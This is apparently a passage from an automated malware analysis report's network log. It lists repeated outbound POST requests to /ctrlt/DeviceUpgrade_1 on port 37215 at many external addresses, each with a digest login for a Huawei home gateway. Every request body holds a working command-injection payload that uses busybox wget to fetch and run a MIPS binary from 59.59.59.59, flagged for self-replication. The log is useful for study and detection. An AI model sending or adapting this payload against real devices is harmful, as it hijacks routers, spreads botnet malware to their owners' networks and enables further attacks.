                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          996192.168.2.155121041.225.196.2637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696744919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          997192.168.2.1542386106.194.158.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696772099 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          998192.168.2.1558516157.80.110.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696794987 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          999192.168.2.1556964107.52.207.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.696826935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1000192.168.2.1544710197.146.99.8937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697201967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1001192.168.2.1558120157.9.176.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697227955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1002192.168.2.1550238197.175.77.2737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697257042 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1003192.168.2.1533016176.50.118.12037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697283030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1004192.168.2.154502241.161.119.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697309971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1005192.168.2.1542346197.243.102.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697345018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 